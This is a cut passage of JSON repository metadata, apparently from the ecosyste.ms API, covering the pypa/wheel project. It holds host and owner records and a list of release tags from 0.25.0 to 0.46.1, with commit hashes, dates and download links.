analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositor